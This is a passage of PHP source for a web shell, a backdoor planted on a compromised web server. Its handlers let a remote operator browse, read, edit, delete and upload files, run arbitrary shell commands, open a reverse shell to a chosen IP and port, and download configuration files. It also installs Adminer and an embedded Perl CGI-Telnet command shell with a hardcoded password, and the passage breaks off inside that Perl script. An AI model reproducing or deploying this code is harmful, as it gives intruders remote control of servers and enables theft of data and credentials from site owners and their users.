list_dir(base64_decode($_POST['list_dir']));
if($list === false){
$output['status'] = 'no_dir';
exit(json_encode($output));
}
exit(json_encode($list));
}elseif(isset($_POST['remove_file'])){
$remove = $helpers->remove_file(base64_decode($_POST['remove_file']));
if($remove){
$output['status'] = 'removed';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['chmod_target']) && isset($_POST['chmod'])){
$setchmod = $helpers->set_chmod(base64_decode($_POST['chmod_target']),base64_decode($_POST['chmod']));
if($setchmod){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['rename_target']) && isset($_POST['new_name']) && isset($_POST['old_name'])){
$rename = $helpers->rename(base64_decode($_POST['rename_target']),$_POST['new_name'],$_POST['old_name']);
if($rename){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['read_file'])){
if(is_file(base64_decode($_POST['read_file']))){
$pathinfo = pathinfo(base64_decode($_POST['read_file']));
if(stristr($pathinfo['extension'],'zip') || stristr($pathinfo['extension'],'rar') || stristr($pathinfo['extension'],'tar') || stristr($pathinfo['extension'],'tar.gz') || stristr($pathinfo['extension'],'7z')){
$output['status'] = 'failed';
exit(json_encode($output));
}elseif(stristr($pathinfo['extension'],'m4a') || stristr($pathinfo['extension'],'flac') || stristr($pathinfo['extension'],'mp3') || stristr($pathinfo['extension'],'wav') || stristr($pathinfo['extension'],'aac') || stristr($pathinfo['extension'],'wma')){
$output['audio'] = base64_decode($_POST['read_file']);
$output['type'] = $helpers->getMimeType(base64_decode($_POST['read_file']));
exit(json_encode($output));
}elseif(stristr($pathinfo['extension'],'mp4') || stristr($pathinfo['extension'],'avi') || stristr($pathinfo['extension'],'mov') || stristr($pathinfo['extension'],'wmv') || stristr($pathinfo['extension'],'flv') || stristr($pathinfo['extension'],'avchd') || stristr($pathinfo['extension'],'mkv') || stristr($pathinfo['extension'],'3gp')){
$output['video'] = base64_decode($_POST['read_file']);
$output['type'] = $helpers->getMimeType(base64_decode($_POST['read_file']));
exit(json_encode($output));
}
$read_file = @file_get_contents(base64_decode($_POST['read_file']));
if($read_file !== false){
if(stristr($pathinfo['extension'],'jpg') || stristr($pathinfo['extension'],'ico') || stristr($pathinfo['extension'],'png') || stristr($pathinfo['extension'],'bmp') || stristr($pathinfo['extension'],'gif') || stristr($pathinfo['extension'],'jpeg') || stristr($pathinfo['extension'],'webp') || stristr($pathinfo['extension'],'svg')){
$output['data_url'] = 'data: '.$helpers->getMimeType(base64_decode($_POST['read_file'])).';base64,'.base64_encode($read_file);
}
$output['content'] = base64_encode($read_file);
}else{
$output['status'] = 'failed';
}
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['edit_file'])){
if(isset($_POST['rename'])){
if(@rename(base64_decode($_POST['edit_file']),base64_decode($_POST['rename']))){
if(isset($_POST['content'])){
if(@file_put_contents(base64_decode($_POST['rename']),base64_decode($_POST['content']),LOCK_EX)){
$output['status'] = @basename(base64_decode($_POST['rename']));
$output['old_name']= @basename(base64_decode($_POST['edit_file']));
}else{
$output['status'] = @basename(base64_decode($_POST['rename']));
$output['old_name']= @basename(base64_decode($_POST['edit_file']));
}
}else{
$output['status'] = @basename(base64_decode($_POST['rename']));
$output['old_name']= @basename(base64_decode($_POST['edit_file']));
}
}else{
$output['status'] = 'failed';
}
}else{
if(isset($_POST['content'])){
if(@file_put_contents(base64_decode($_POST['edit_file']),base64_decode($_POST['content']),LOCK_EX)){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
}
}
exit(json_encode($output));
}elseif(isset($_POST['create_file']) && isset($_POST['directory'])){
if(!@file_exists(base64_decode($_POST['directory']).'/'.base64_decode($_POST['create_file'])) || !@is_dir(base64_decode($_POST['directory']).'/'.base64_decode($_POST['create_file']))){
if(@touch(base64_decode($_POST['directory']).'/'.base64_decode($_POST['create_file']))){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
}else{
$output['status'] = 'already_exists';
}
exit(json_encode($output));
}elseif(isset($_POST['create_dir']) && isset($_POST['directory'])){
if(!@file_exists(base64_decode($_POST['directory']).'/'.base64_decode($_POST['create_dir'])) || !@is_dir(base64_decode($_POST['directory']).'/'.base64_decode($_POST['create_dir']))){
if(@mkdir(base64_decode($_POST['directory']).'/'.base64_decode($_POST['create_dir']))){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
}else{
$output['status'] = 'already_exists';
}
exit(json_encode($output));
}elseif(isset($_FILES['files']) && isset($_POST['directory'])){
foreach($_FILES['files']['name'] as $key => $name){
$upload = $helpers->file_upload($_FILES['files']['tmp_name'][$key],$name,base64_decode($_POST['directory']));
if($upload){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
}
exit(json_encode($output));
}elseif(isset($_POST['command']) && isset($_POST['directory'])){
$cmd = $helpers->run_cmd(base64_decode($_POST['command']),base64_decode($_POST['directory']));
if($cmd){
$output['status'] = base64_encode($cmd);
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['symlink_target'])){
$symlink = $helpers->create_symlink(base64_decode($_POST['symlink_target']));
if($symlink){
$output['status'] = base64_encode(htmlentities($symlink));
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['search_location']) && isset($_POST['search_keyword']) && isset($_POST['search_type'])){
$command = $helpers->run_cmd($helpers->prepare_search_cmd($_POST['search_location'],$_POST['search_keyword'],$_POST['search_type']));
if($command){
$output['status'] = base64_encode($command);
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['download_cfg'])){
$zipAll = $helpers->download_configs(base64_decode($_POST['download_cfg']));
if($zipAll == false){
$output['status'] = 'failed';
}else{
$output['url'] = $zipAll;
}
exit(json_encode($output));
}elseif(isset($_POST['update_content'])){
if(@file_put_contents(basename($_SERVER['PHP_SELF']),base64_decode($_POST['update_content']))){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['getip'])){
$client_ip = $helpers->getClientIP();
if($client_ip){
$output['status'] = $client_ip;
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_POST['rev_ip']) && isset($_POST['rev_port']) && isset($_POST['method'])){
$create_shell = $helpers->reverse_shell($_POST['rev_ip'],$_POST['rev_port'],$_POST['method']);
if($create_shell){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}
exit;
}
if(isset($_GET['download_file'])){
$file = base64_decode($_GET['download_file']);
$download = $helpers->download_file($file);
if($download === false){
print ';';
}
exit;
}elseif(isset($_GET['adminer'])){
$adminer = $helpers->get_adminer();
if($adminer){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_GET['cgitelnet'])){
$cgitelnet = $helpers->get_cgitelnet();
if($cgitelnet){
$output['status'] = 'ok';
}else{
$output['status'] = 'failed';
}
exit(json_encode($output));
}elseif(isset($_GET['play_audio'])){
$audioPath = $_GET['play_audio'];
header('Cache-Control: no-cache');
header('Content-Transfer-Encoding: binary');
header('Content-Type: audio/mp3');
header('Content-Length: ' . filesize($audioPath));
header('Accept-Ranges: bytes');
readfile($audioPath);
exit;
}elseif(isset($_GET['play_video'])){
$videoPath = $_GET['play_video'];
header('Cache-Control: no-cache');
header('Content-Transfer-Encoding: binary');
header('Content-Type: video/mp4');
header('Content-Length: ' . filesize($videoPath));
header('Accept-Ranges: bytes');
readfile($videoPath);
exit;
}elseif(isset($_GET['download_folder'])){
if(is_dir(base64_decode($_GET['download_folder']))){
$zip_folder = $helpers->download_as_zip(base64_decode($_GET['download_folder']));
if($zip_folder == false){
exit;
}else{
$download_folder = $helpers->download_file($zip_folder,true);
if($download_folder == false){
exit;
}
exit;
}
}else{
exit;
}
exit;
}elseif(isset($_GET['download_cfg_file'])){
$download_cfg = $helpers->download_file(base64_decode($_GET['download_cfg_file']),true);
if($download_cfg == false){
exit;
}
exit;
}
if(!function_exists('posix_getgrgid')){
function posix_getgrgid($gid)
{
return false;
}
}
?>
-
-
- uid=() gid=()
- get_users_count(); if($user_count != 'Windows not supported'){ print ''.$user_count.'';}else{print $user_count;} ?>
- get_groups_count(); if($group_count != 'Windows not supported'){print ''.$group_count.'';}else{print $group_count;} ?>
- ON (secure)"; }else { print "OFF";} ?>
- " . $v . ""; }else{ print "OFF";}?>
- " . $df . ""; }else{ print "NONE";}?>
-
-
-
get_ip_information(); ?> [ IP Address: , Country: , City: , Region: , Timezone: ]
|
Name |
Size |
Last Modified |
Permissions |
Action |
get_type($data);
$dirs['perms'][] = $this->view_perms_color($data);
$dirs['perm_num'][] = $this->view_perm_number($data);
$dirs['size'][] = $this->get_size($data);
$dirs['modify'][] = $this->modify_time($data);
}else{
$files['name'][] = $data;
$files['type'][] = $this->get_type($data);
$files['perms'][] = $this->view_perms_color($data);
$files['perm_num'][] = $this->view_perm_number($data);
$files['size'][] = $this->get_size($data);
$files['modify'][] = $this->modify_time($data);
}
}
$return_list = array();
$count = @count($dirs['name']);
for($i = 0; $i < $count; $i++){
$return_list['name'][] = $dirs['name'][$i];
$return_list['path'][] = $dirpath.'/'.$dirs['name'][$i];
$return_list['type'][] = $dirs['type'][$i];
$return_list['perms'][] = $dirs['perms'][$i];
$return_list['perm_num'][] = $dirs['perm_num'][$i];
$return_list['size'][] = $dirs['size'][$i];
$return_list['modify'][] = $dirs['modify'][$i];
}
$count2 = @count($files['name']);
for($x = 0; $x < $count2; $x++){
$return_list['name'][] = $files['name'][$x];
$return_list['path'][] = $dirpath.'/'.$files['name'][$x];
$return_list['type'][] = $files['type'][$x];
$return_list['perms'][] = $files['perms'][$x];
$return_list['perm_num'][]= $files['perm_num'][$x];
$return_list['size'][] = $files['size'][$x];
$return_list['modify'][] = $files['modify'][$x];
}
$return_list['current_dir'][] = str_replace('\\','/',@getcwd());
return $return_list;
}
public function get_type($target){
if(is_dir($target)){
return 'directory';
}else{
return 'file';
}
}
public function get_size($target){
if(is_file($target)){
return $this->human_filesize(@filesize($target));
}else{
return 'DIR';
}
}
public function modify_time($target){
return date('d/m/Y - H:i:s',@filemtime($target));
}
public function human_filesize($bytes, $decimals = 2) {
// https://gist.github.com/liunian/9338301
$size = array('B','kB','MB','GB','TB','PB','EB','ZB','YB');
$factor = floor((strlen($bytes) - 1) / 3);
return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . @$size[$factor];
}
// view_perms & view_perms_color functions are taken from c99
// Updated by: KaizenLouie for PHP 7
// Find it on github
public function view_perms($mode){
if (($mode & 0xC000) === 0xC000)
{
$type = "s";
}
elseif (($mode & 0x4000) === 0x4000)
{
$type = "d";
}
elseif (($mode & 0xA000) === 0xA000)
{
$type = "l";
}
elseif (($mode & 0x8000) === 0x8000)
{
$type = "-";
}
elseif (($mode & 0x6000) === 0x6000)
{
$type = "b";
}
elseif (($mode & 0x2000) === 0x2000)
{
$type = "c";
}
elseif (($mode & 0x1000) === 0x1000)
{
$type = "p";
}
else
{
$type = "?";
}
$owner["read"] = ($mode & 00400) ? "r" : "-";
$owner["write"] = ($mode & 00200) ? "w" : "-";
$owner["execute"] = ($mode & 00100) ? "x" : "-";
$group["read"] = ($mode & 00040) ? "r" : "-";
$group["write"] = ($mode & 00020) ? "w" : "-";
$group["execute"] = ($mode & 00010) ? "x" : "-";
$world["read"] = ($mode & 00004) ? "r" : "-";
$world["write"] = ($mode & 00002) ? "w" : "-";
$world["execute"] = ($mode & 00001) ? "x" : "-";
if ($mode & 0x800)
{
$owner["execute"] = ($owner["execute"] == "x") ? "s" : "S";
}
if ($mode & 0x400)
{
$group["execute"] = ($group["execute"] == "x") ? "s" : "S";
}
if ($mode & 0x200)
{
$world["execute"] = ($world["execute"] == "x") ? "t" : "T";
}
return $type . join("", $owner) . join("", $group) . join("", $world);
}
public function view_perms_color($o)
{
if (!is_readable($o))
{
return "" . $this->view_perms(@fileperms($o)) . "";
}
elseif (!is_writable($o))
{
return "" . $this->view_perms(@fileperms($o)) . "";
}
else
{
return "" . $this->view_perms(@fileperms($o)) . "";
}
}
public function view_perm_number($file){
return substr(sprintf("%o", @fileperms($file)), -4);
}
public function folderSize ($dir)
{
$size = 0;
$contents = glob(rtrim($dir, '/').'/*', GLOB_NOSORT);
foreach ($contents as $contents_value) {
if (is_file($contents_value)) {
$size += filesize($contents_value);
} else {
$size += $this->folderSize($contents_value);
}
}
return $size;
}
public function download_file($file,$remove = false){
$pathinfo = pathinfo($file);
header('Content-type: application/octet-stream');
header("Content-Disposition: attachment; filename=".$pathinfo['basename']);
ob_end_clean();
if(is_readable($file)){
readfile($file);
if($remove) @unlink($file);
exit;
}else{
return false;
}
}
public function remove_file($file){
if(is_dir($file)){
$rmdir = $this->delete_dir($file);
if($rmdir){
return true;
}else{
return false;
}
}else{
if(@unlink($file)){
return true;
}else{
return false;
}
}
}
public function delete_dir($dir) {
$files = array_diff(scandir($dir), array('.','..'));
foreach ($files as $file)
(is_dir("$dir/$file")) ? $this->delete_dir("$dir/$file") : @unlink("$dir/$file");
if(rmdir($dir)){
return true;
}else{
return false;
}
}
public function set_chmod($target,$mode){
if(@chmod($target,octdec($mode))){
return true;
}else{
return false;
}
}
public function rename($target,$name,$old_name){
$new_name = str_replace($old_name,$name,$target);
if(@rename($target,$new_name)){
return true;
}else{
return false;
}
}
public function file_upload($temp,$filename,$where){
if(function_exists('move_uploaded_file')){
if(@move_uploaded_file($temp,$where.'/'.$filename)){
return true;
}else{
return false;
}
}elseif(function_exists('copy')){
if(@copy($temp,$where.'/'.$filename)){
return true;
}else{
return false;
}
}else{
return false;
}
}
public function run_cmd($cmd,$dir = null){
if($dir != null) @chdir($dir);
if(function_exists("shell_exec")){
$run = shell_exec($cmd);
return 'shell_exec|'.trim($run);
}elseif(function_exists("exec")){
$run = exec($cmd,$result);
return 'exec|'.implode("\r\n",array_map('trim',$result));
}elseif(function_exists("popen")){
$run = popen($cmd,"r");
$result = "";
while(!feof($run)){
$buffer = fgets($run,4096);
$result .= "-> $buffer\r\n";
}
pclose($run);
return 'popen|'.trim($result);
}elseif(function_exists("passthru")){
passthru($cmd);
$content = ob_get_clean();
return 'passthru|'.trim($content);
}elseif(function_exists("system")){
system($cmd);
$content = ob_get_clean();
return 'system|'.trim($content);
}else{
return false;
}
}
public function getClientIP() {
if(!empty($_SERVER['HTTP_CLIENT_IP'])) {
$ip = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else{
$ip = $_SERVER['REMOTE_ADDR'];
}
return $ip;
}
public function get_adminer(){
// https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-en.php
$name = 'adminer-web.php';
if(file_exists($name)){
return true;
}else{
$curl = curl_init();
curl_setopt_array($curl,array(CURLOPT_RETURNTRANSFER => 1,CURLOPT_URL => 'https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-en.php',CURLOPT_FOLLOWLOCATION => 1,CURLOPT_TIMEOUT => 20));
$output = curl_exec($curl);
curl_close($curl);
if(@file_put_contents($name,$output)){
return true;
}else{
return false;
}
}
}
public function get_cgitelnet(){
$name = 'cgi_web.pl';
$cgiTelnetCode = base64_decode('#!/usr/bin/perl
#------------------------------------------------------------------------------
# Copyright and Licence
#------------------------------------------------------------------------------
# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
#
# Copyright (C) 2001 Rohitab Batra
# Permission is granted to use, distribute and modify this script so long
# as this copyright notice is left intact. If you make changes to the script
# please document them and inform me. If you would like any changes to be made
# in this script, you can e-mail me.
#
# Author: Rohitab Batra
# Author e-mail: rohitab@rohitab.com
# Author Homepage: http://www.rohitab.com/
# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
# Product Support: http://www.rohitab.com/support/
# Discussion Forum: http://www.rohitab.com/discuss/
# Mailing List: http://www.rohitab.com/mlist/
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Installation
#------------------------------------------------------------------------------
# To install this script
#
# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
#    your server. For most servers, you may not need to modify this.
# 2. Change the password in the Configuration section below.
# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
#    Configuration Section below.
# 4. Upload the script to a directory on your server which has permissions to
#    execute CGI scripts. This is usually cgi-bin. Make sure that you upload
#    the script in ASCII mode.
# 5. Change the permission (CHMOD) of the script to 755.
# 6. Open the script in your web browser. If you uploaded the script in
#    cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
# 7. Login using the password that you specified in Step 2.
#------------------------------------------------------------------------------

#------------------------------------------------------------------------------
# Configuration: You need to change only $Password and $WinNT. The other
# values should work fine for most systems.
#------------------------------------------------------------------------------
$Password = "mws";		# Change this. You will need to enter this
				# to login.

$WinNT = 0;			# You need to change the value of this to 1 if
				# you're running this script on a Windows NT
				# machine. If you're running it on Unix, you
				# can leave the value as it is.

$NTCmdSep = "&";		# This character is used to seperate 2 commands
				# in a command line on Windows NT.

$UnixCmdSep = ";";		# This character is used to seperate 2 commands
				# in a command line on Unix.

$CommandTimeoutDuration = 10;	# Time in seconds after commands will be killed
				# Don't set this to a very large value. This is
				# useful for commands that may hang or that
				# take very long to execute, like "find /".
				# This is valid only on Unix servers. It is
				# ignored on NT Servers.

$ShowDynamicOutput = 1;		# If this is 1, then data is sent to the
				# browser as soon as it is output, otherwise
				# it is buffered and send when the command
				# completes. This is useful for commands like
				# ping, so that you can see the output as it
				# is being generated.

# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!

$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
$CmdPwd = ($WinNT ? "cd" : "pwd");
$PathSep = ($WinNT ? "\\" : "/");
$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");

#------------------------------------------------------------------------------
# Reads the input sent by the browser and parses the input variables. It
# parses GET, POST and multipart/form-data that is used for uploading files.
# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
# Other variables can be accessed using $in{'var'}, where var is the name of
# the variable. Note: Most of the code in this function is taken from other CGI
# scripts.
#------------------------------------------------------------------------------
sub ReadParse 
{
	local (*in) = @_ if @_;
	local ($i, $loc, $key, $val);
	
	$MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;

	if($ENV{'REQUEST_METHOD'} eq "GET")
	{
		$in = $ENV{'QUERY_STRING'};
	}
	elsif($ENV{'REQUEST_METHOD'} eq "POST")
	{
		binmode(STDIN) if $MultipartFormData & $WinNT;
		read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
	}

	# handle file upload data
	if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
	{
		$Boundary = '--'.$1; # please refer to RFC1867 
		@list = split(/$Boundary/, $in); 
		$HeaderBody = $list[1];
		$HeaderBody =~ /\r\n\r\n|\n\n/;
		$Header = $`;
		$Body = $';
 		$Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
		$in{'filedata'} = $Body;
		$Header =~ /filename=\"(.+)\"/; 
		$in{'f'} = $1; 
		$in{'f'} =~ s/\"//g;
		$in{'f'} =~ s/\s//g;

		# parse trailer
		for($i=2; $list[$i]; $i++)
		{ 
			$list[$i] =~ s/^.+name=$//;
			$list[$i] =~ /\"(\w+)\"/;
			$key = $1;
			$val = $';
			$val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} = $val; 
		}
	}
	else # standard post data (url encoded, not multipart)
	{
		@in = split(/&/, $in);
		foreach $i (0 .. $#in)
		{
			$in[$i] =~ s/\+/ /g;
			($key, $val) = split(/=/, $in[$i], 2);
			$key =~ s/%(..)/pack("c", hex($1))/ge;
			$val =~ s/%(..)/pack("c", hex($1))/ge;
			$in{$key} .= "\0" if (defined($in{$key}));
			$in{$key} .= $val;
		}
	}
}

#------------------------------------------------------------------------------
# Prints the HTML Page Header
# Argument 1: Form item name to which focus should be set
#------------------------------------------------------------------------------
sub PrintPageHeader
{
	$EncodedCurrentDir = $CurrentDir;
	$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
	print "Content-type: text/html\n\n";
	print <<END;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>CGI-Telnet Version 1.0</title>
$HtmlMetaHeader
</head>
<body onLoad="document.f.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
<table border="1" width="100%" cellspacing="0" cellpadding="2">
<tr>
<td bgcolor="#C2BFA5" bordercolor="#000080" align="center">
<b><font color="#000080" size="2">#</font></b></td>
<td bgcolor="#000080"><font face="Verdana" size="2" color="#FFFFFF"><b>CGI-Telnet Version 1.0 - Connected to $ServerName</b></font></td>
</tr>
<tr>
<td colspan="2" bgcolor="#C2BFA5"><font face="Verdana" size="2">
<a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> | 
<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
<a href="$ScriptLocation?a=logout">Disconnect</a> |
<a href="http://www.rohitab.com/cgiscripts/cgitelnet.html">Help</a>
</font></td>
</tr>
</table>
<font color="#C0C0C0" size="3">
END
}

#------------------------------------------------------------------------------
# Prints the Login Screen
#------------------------------------------------------------------------------
sub PrintLoginScreen
{
	$Message = q$<pre><font color="#669999"> _____  _____  _____          _____        _               _
/  __ \|  __ \|_   _|        |_   _|      | |             | |
| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
 \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
                                         
</font><font color="#FF0000">                      ______             </font><font color="#AE8300">© 2001, Rohitab Batra</font><font color="#FF0000">
                   .-&quot;      &quot;-.
                  /            \
                 |              |
                 |,  .-.  .-.  ,|
                 | )(_o/  \o_)( |
                 |/     /\     \|
       (@_       (_     ^^     _)
  _     ) \</font><font color="#808080">_______</font><font color="#FF0000">\</font><font color="#808080">__</font><font color="#FF0000">|IIIIII|</font><font color="#808080">__</font><font color="#FF0000">/</font><font color="#808080">_______________________
</font><font color="#FF0000"> (_)</font><font color="#808080">@8@8</font><font color="#FF0000">{}</font><font color="#808080">&lt;________</font><font color="#FF0000">|-\IIIIII/-|</font><font color="#808080">________________________&gt;</font><font color="#FF0000">
        )_/        \          / 
       (@           `--------`
             </font><font color="#AE8300">W A R N I N G: Private Server</font></pre>
$;
#'
	print <<END;
<code>
Trying $ServerName...<br>
Connected to $ServerName<br>
Escape character is ^]
<code>$Message
END
}

#------------------------------------------------------------------------------
# Prints the message that informs the user of a failed login
#------------------------------------------------------------------------------
sub PrintLoginFailedMessage
{
	print <<END;
<code>
<br>login: admin<br>
password:<br>
Login incorrect<br><br>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form for logging in
#------------------------------------------------------------------------------
sub PrintLoginForm
{
	print <<END;
<code>
<form name="f" id="cgi" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="login">
login: admin<br>
password:<input type="password" value="mws" name="p">
<input type="submit" value="Enter">
</form>
<script>setTimeout(function(){document.getElementById('cgi').submit();},150);</script>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the footer for the HTML Page
#------------------------------------------------------------------------------
sub PrintPageFooter
{
	print "</font></body></html>";
}

#------------------------------------------------------------------------------
# Retreives the values of all cookies. The cookies can be accesses using the
# variable $Cookies{''}
#------------------------------------------------------------------------------
sub GetCookies
{
	@httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
	foreach $cookie(@httpcookies)
	{
		($id, $val) = split(/=/, $cookie);
		$Cookies{$id} = $val;
	}
}

#------------------------------------------------------------------------------
# Prints the screen when the user logs out
#------------------------------------------------------------------------------
sub PrintLogoutScreen
{
	print "<code>Connection closed by foreign host.<br><br></code>";
}

#------------------------------------------------------------------------------
# Logs out the user and allows the user to login again
#------------------------------------------------------------------------------
sub PerformLogout
{
	print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
	&PrintPageHeader("p");
	&PrintLogoutScreen;
	&PrintLoginScreen;
	&PrintLoginForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function is called to login the user. If the password matches, it
# displays a page that allows the user to run commands. If the password doens't
# match or if no password is entered, it displays a form that allows the user
# to login
#------------------------------------------------------------------------------
sub PerformLogin 
{
	if($LoginPassword eq $Password) # password matched
	{
		print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
		&PrintPageHeader("c");
		&PrintCommandLineInputForm;
		&PrintPageFooter;
	}
	else # password didn't match
	{
		&PrintPageHeader("p");
		&PrintLoginScreen;
		if($LoginPassword ne "") # some password was entered
		{
			&PrintLoginFailedMessage;
		}
		&PrintLoginForm;
		&PrintPageFooter;
	}
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to enter commands
#------------------------------------------------------------------------------
sub PrintCommandLineInputForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="a" value="command">
<input type="hidden" name="d" value="$CurrentDir">
$Prompt
<input type="text" name="c">
<input type="submit" value="Enter">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to download files
#------------------------------------------------------------------------------
sub PrintFileDownloadForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" method="POST" action="$ScriptLocation">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="download">
$Prompt download<br><br>
Filename: <input type="text" name="f" size="35"><br><br>
Download: <input type="submit" value="Begin">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# Prints the HTML form that allows the user to upload files
#------------------------------------------------------------------------------
sub PrintFileUploadForm
{
	$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
	print <<END;
<code>
<form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
$Prompt upload<br><br>
Filename: <input type="file" name="f" size="35"><br><br>
Options: &nbsp;<input type="checkbox" name="o" value="overwrite">
Overwrite if it Exists<br><br>
Upload:&nbsp;&nbsp;&nbsp;<input type="submit" value="Begin">
<input type="hidden" name="d" value="$CurrentDir">
<input type="hidden" name="a" value="upload">
</form>
</code>
END
}

#------------------------------------------------------------------------------
# This function is called when the timeout for a command expires. We need to
# terminate the script immediately. This function is valid only on Unix. It is
# never called when the script is running on NT.
#------------------------------------------------------------------------------
sub CommandTimeout
{
	if(!$WinNT)
	{
		alarm(0);
		print <<END;
</xmp>
<code>
Command exceeded maximum time of $CommandTimeoutDuration second(s).
<br>Killed it!
<code>
END
		&PrintCommandLineInputForm;
		&PrintPageFooter;
		exit;
	}
}

#------------------------------------------------------------------------------
# This function is called to execute commands. It displays the output of the
# command and allows the user to enter another command. The change directory
# command is handled differently. In this case, the new directory is stored in
# an internal variable and is used each time a command has to be executed. The
# output of the change directory command is not displayed to the users
# therefore error messages cannot be displayed.
#------------------------------------------------------------------------------
sub ExecuteCommand
{
	if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
	{
		# we change the directory internally. The output of the
		# command is not displayed.
		
		$OldDir = $CurrentDir;
		$Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
		chop($CurrentDir = `$Command`);
		&PrintPageHeader("c");
		$Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ ";
		print "<code>$Prompt $RunCommand</code>";
	}
	else # some other command, display the output
	{
		&PrintPageHeader("c");
		$Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ ";
		print "<code>$Prompt $RunCommand</code><xmp>";
		$Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
		if(!$WinNT)
		{
			$SIG{'ALRM'} = \&CommandTimeout;
			alarm($CommandTimeoutDuration);
		}
		if($ShowDynamicOutput) # show output as it is generated
		{
			$|=1;
			$Command .= " |";
			open(CommandOutput, $Command);
			while(<CommandOutput>)
			{
				$_ =~ s/(\n|\r\n)$//;
				print "$_\n";
			}
			$|=0;
		}
		else # show output after command completes
		{
			print `$Command`;
		}
		if(!$WinNT)
		{
			alarm(0);
		}
		print "</xmp>";
	}
	&PrintCommandLineInputForm;
	&PrintPageFooter;
}

#------------------------------------------------------------------------------
# This function displays the page that contains a link which allows the user
# to download the specified file. The page also contains a auto-refresh
# feature that starts the download automatically.
# Argument 1: Fully qualified filename of the file to be downloaded
#------------------------------------------------------------------------------
sub PrintDownloadLinkPage
{
	local($FileUrl) = @_;
	if(-e $FileUrl) # if the file exists
	{
		# encode the file link so we can send it to the browser
		$FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
		$DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
		$HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
		&PrintPageHeader("c");
		print <<END;
<code>
Sending File $TransferFile...<br>
If the download does not start automatically,
<a href="$DownloadLink">Click Here</a>.
</code>
END
